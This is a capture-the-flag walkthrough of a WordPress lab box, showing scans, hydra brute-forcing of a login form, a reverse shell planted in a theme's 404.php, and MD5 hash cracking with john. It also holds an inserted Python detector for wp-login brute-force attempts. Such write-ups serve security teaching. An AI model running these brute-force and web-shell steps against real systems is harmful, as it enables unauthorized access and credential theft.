Categories: walkthrough
Tags: tryhackme, thm, gobuster, wordpress, wpscan, xss-vulnerability, xss, CVE-2019-9887, hydra, john-the-ripper, PrivEsc, Linux-Machine, PrivEsc-Linux, PrivEsc-SUID, SUID, PrivEsc-nmap
$ nmap -p0-65535 -vvv 10.10.131.32 --reason
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 08:43 EDT
Initiating Ping Scan at 08:43
Scanning 10.10.131.32 [2 ports]
Completed Ping Scan at 08:43, 0.16s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:44
Completed Parallel DNS resolution of 1 host. at 08:44, 6.53s elapsed
DNS resolution of 1 IPs took 6.53s. Mode: Async [#: 2, OK: 0, NX: 1, DR: 0, SF: 0, TR: 3, CN: 0]
Initiating Connect Scan at 08:44
Scanning 10.10.131.32 [2 ports]
Discovered open port 443/tcp on 10.10.131.32
Discovered open port 80/tcp on 10.10.131.32
Completed Connect Scan at 08:44, 0.16s elapsed (2 total ports)
Nmap scan report for 10.10.131.32
Host is up, received syn-ack (0.16s latency).
Scanned at 2021-07-18 08:43:59 EDT for 7s
PORT STATE SERVICE REASON
80/tcp open http syn-ack
443/tcp open https syn-ack
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 6.90 seconds
$ nmap -sV -sC -p80,443 10.10.131.32
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-18 08:47 EDT
Nmap scan report for 10.10.131.32
Host is up (0.16s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
443/tcp open ssl/http Apache httpd
|_http-server-header: Apache
|_http-title: Site doesn't have a title (text/html).
| ssl-cert: Subject: commonName=www.example.com
| Not valid before: 2015-09-16T10:45:03
|_Not valid after: 2025-09-13T10:45:03
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 28.99 seconds
There is not much on the home page: it is a themed interactive shell that does not respond to any commands. Let's fuzz for directories.
$ gobuster dir -u http://10.10.131.32/ -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://10.10.131.32/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.1.0
[+] Timeout: 10s
===============================================================
2021/07/18 08:08:05 Starting gobuster in directory enumeration mode
===============================================================
/images (Status: 301) [Size: 235] [--> http://10.10.131.32/images/]
/blog (Status: 301) [Size: 233] [--> http://10.10.131.32/blog/]
/sitemap (Status: 200) [Size: 0]
/rss (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/login (Status: 302) [Size: 0] [--> http://10.10.131.32/wp-login.php]
/0 (Status: 301) [Size: 0] [--> http://10.10.131.32/0/]
/video (Status: 301) [Size: 234] [--> http://10.10.131.32/video/]
/feed (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/image (Status: 301) [Size: 0] [--> http://10.10.131.32/image/]
/atom (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/atom/]
/wp-content (Status: 301) [Size: 239] [--> http://10.10.131.32/wp-content/]
/admin (Status: 301) [Size: 234] [--> http://10.10.131.32/admin/]
/audio (Status: 301) [Size: 234] [--> http://10.10.131.32/audio/]
/intro (Status: 200) [Size: 516314]
/wp-login (Status: 200) [Size: 2606]
/css (Status: 301) [Size: 232] [--> http://10.10.131.32/css/]
/rss2 (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/]
/license (Status: 200) [Size: 309]
/wp-includes (Status: 301) [Size: 240] [--> http://10.10.131.32/wp-includes/]
/js (Status: 301) [Size: 231] [--> http://10.10.131.32/js/]
/Image (Status: 301) [Size: 0] [--> http://10.10.131.32/Image/]
/rdf (Status: 301) [Size: 0] [--> http://10.10.131.32/feed/rdf/]
/page1 (Status: 301) [Size: 0] [--> http://10.10.131.32/]
/readme (Status: 200) [Size: 64]
/robots (Status: 200) [Size: 41]
/dashboard (Status: 302) [Size: 0] [--> http://10.10.131.32/wp-admin/]
/%20 (Status: 301) [Size: 0] [--> http://10.10.131.32/]
Navigating to the directories found by gobuster, we got the first key and fsocity.dic, which contains a list of dictionary words.
Navigating to the login directory, we are greeted with the WordPress login page. Let's run wpscan for more information.
$ wpscan --url http://10.10.131.32
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.18
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[i] It seems like you have not updated the database for some time.
[?] Do you want to update now? [Y]es [N]o, default: [N]Y
[i] Updating the Database ...
[i] Update completed.
[+] URL: http://10.10.131.32/ [10.10.131.32]
[+] Started: Sun Jul 18 09:30:22 2021
Interesting Finding(s):
[+] Headers
| Interesting Entries:
| - Server: Apache
| - X-Mod-Pagespeed: 1.9.32.3-4523
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://10.10.131.32/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://10.10.131.32/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
[+] The external WP-Cron seems to be enabled: http://10.10.131.32/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 4.3.1 identified (Insecure, released on 2015-09-15).
| Found By: Emoji Settings (Passive Detection)
| - http://10.10.131.32/254b937.html, Match: 'wp-includes\/js\/wp-emoji-release.min.js?ver=4.3.1'
| Confirmed By: Meta Generator (Passive Detection)
| - http://10.10.131.32/254b937.html, Match: 'WordPress 4.3.1'
[+] WordPress theme in use: twentyfifteen
| Location: http://10.10.131.32/wp-content/themes/twentyfifteen/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://10.10.131.32/wp-content/themes/twentyfifteen/readme.txt
| [!] The version is out of date, the latest version is 2.9
| Style URL: http://10.10.131.32/wp-content/themes/twentyfifteen/style.css?ver=4.3.1
| Style Name: Twenty Fifteen
| Style URI: https://wordpress.org/themes/twentyfifteen/
| Description: Our 2015 default theme is clean, blog-focused, and designed for clarity. Twenty Fifteen's simple, st...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In 404 Page (Passive Detection)
|
| Version: 1.3 (80% confidence)
| Found By: Style (Passive Detection)
| - http://10.10.131.32/wp-content/themes/twentyfifteen/style.css?ver=4.3.1, Match: 'Version: 1.3'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:06 <====================================================================================================================================================> (137 / 137) 100.00% Time: 00:00:06
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register
[+] Finished: Sun Jul 18 09:30:37 2021
[+] Requests Done: 183
[+] Cached Requests: 6
[+] Data Sent: 44.111 KB
[+] Data Received: 13.817 MB
[+] Memory used: 212.887 MB
[+] Elapsed time: 00:00:15
The WordPress version is 4.3.1 and the twentyfifteen theme is in use.
WordPress 4.3.1 has an XSS vulnerability, CVE-2019-9887, but it requires an already authenticated admin account to work, so it is not an option yet.
The default username for WordPress is admin, so let's try admin:password as credentials.
The login page responds with "Invalid username", so the default username has been changed. Note that this distinct error message discloses whether a given username exists, which is what makes the next step possible.
We have a dictionary of words in fsocity.dic. Let's brute-force the username with a sorted copy of it (fsocity_sorted.dic) using hydra.
$ hydra -L ./fsocity_sorted.dic -p password 10.10.131.32 http-form-post '/wp-login.php:log=^USER^&pwd=password&wp-submit=Login+In:Invalid username.' -t 30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-18 10:29:36
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:11452/p:1), ~382 tries per task
[DATA] attacking http-post-form://10.10.131.32:80/wp-login.php:log=^USER^&pwd=password&wp-submit=Login+In:Invalid username.
[80][http-post-form] host: 10.10.131.32 login: Elliot password: password
[80][http-post-form] host: 10.10.131.32 login: elliot password: password
[80][http-post-form] host: 10.10.131.32 login: ELLIOT password: password
1 of 1 target successfully completed, 3 valid passwords found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-18 10:37:04
The username is case-insensitive, and we now get a different warning, indicating that the password is incorrect. Let's find the password for elliot.
$ hydra -l elliot -P ./fsocity_sorted.dic 10.10.131.32 http-form-post '/wp-login.php:log=elliot&pwd=^PASS^&wp-submit=Login+In:The password you entered' -t 30
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-18 10:46:37
[DATA] max 30 tasks per 1 server, overall 30 tasks, 11452 login tries (l:1/p:11452), ~382 tries per task
[DATA] attacking http-post-form://10.10.131.32:80/wp-login.php:log=elliot&pwd=^PASS^&wp-submit=Login+In:The password you entered
[80][http-post-form] host: 10.10.131.32 login: elliot password: REDACTED
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-18 10:56:46
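Detection-side counterpart to the two hydra runs above, as an added example that is not part of the original walkthrough: it parses Apache access-log lines (a constructed sample, not real traffic) and flags source addresses that hammer /wp-login.php, noting whether a redirect, the sign of an accepted login, followed the burst. The function names, the 20-attempts-per-minute threshold and the sample addresses are my own choices.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Apache "combined" access-log line; only the fields the detector needs are captured.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) ')
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"

def parse_line(line):
    """Return (ip, timestamp, method, path without query string, status) or None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    return (m["ip"], datetime.strptime(m["ts"], TS_FMT), m["method"],
            m["path"].split("?", 1)[0], int(m["status"]))

def detect_wp_login_bruteforce(log_text, threshold=20, window=timedelta(seconds=60)):
    """Flag source IPs with >= threshold failed POSTs to /wp-login.php in any `window`.
    A failed WordPress login re-renders the form (200); success redirects (302)."""
    events = defaultdict(list)  # ip -> [(timestamp, status), ...]
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec and rec[2] == "POST" and rec[3] == "/wp-login.php":
            events[rec[0]].append((rec[1], rec[4]))
    alerts = {}
    for ip, hits in events.items():
        hits.sort()
        failures = [ts for ts, st in hits if st == 200]
        peak = start = 0
        for end in range(len(failures)):  # sliding window over failure timestamps
            while failures[end] - failures[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak < threshold:
            continue
        # A 302 at or after the last failed guess means a password was accepted.
        success = any(st == 302 and ts >= failures[-1] for ts, st in hits)
        alerts[ip] = {"failed_attempts": len(failures), "peak_in_window": peak,
                      "login_succeeded_after_burst": success}
    return alerts

def _line(ip, secs, status, method="POST"):  # builds one constructed log line
    ts = datetime.strptime("18/Jul/2021:10:29:36 +0000", TS_FMT) + timedelta(seconds=secs)
    return f'{ip} - - [{ts:{TS_FMT}}] "{method} /wp-login.php HTTP/1.1" {status} 0 "-" "Mozilla/5.0"'

# Constructed sample: a 45-guess burst then a 302; a user who mistypes once; an ignored GET.
SAMPLE_LOG = "\n".join([_line("10.9.1.5", i // 5, 200) for i in range(45)]
                       + [_line("10.9.1.5", 10, 302), _line("10.9.2.7", 30, 200),
                          _line("10.9.2.7", 41, 302), _line("10.9.2.7", 29, 200, "GET")])
```

Running `detect_wp_login_bruteforce(SAMPLE_LOG)` reports only 10.9.1.5, with 45 failures in the window and a successful login after the burst; the legitimate user's single mistake stays below the threshold.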
Using the credentials obtained, we are greeted with the WP dashboard.
Let's get a reverse shell from WordPress. Navigating to Dashboard > Appearance > Editor, edit the 404 template (404.php) and replace its contents with our reverse shell code.
Navigating to http://10.10.131.32/wp-content/themes/twentyfifteen/404.php triggers it and we get the shell.
Spawning a TTY:
$ date
Sun Jul 18 15:42:11 UTC 2021
$ python -c 'import pty; pty.spawn("/bin/bash")'
daemon@linux:/$ ^Z
[1] + 8366 suspended nc -nlvp 9898
$ stty raw -echo; fg
[1] + 8366 continued nc -nlvp 9898
daemon@linux:/$ export TERM=xterm
daemon@linux:/$
Getting the 2nd key
Cracking the hash
$ john --format=raw-md5 --wordlist=/usr/share/wordlists/rockyou.txt user_robot.txt
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 256/256 AVX2 8x3])
Press 'q' or Ctrl-C to abort, almost any other key for status
REDACTED (?)
1g 0:00:00:00 DONE (2021-07-18 11:48) 14.28g/s 581485p/s 581485c/s 581485C/s bonjour1..teletubbies
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
Using nmap for privilege escalation and getting the 3rd key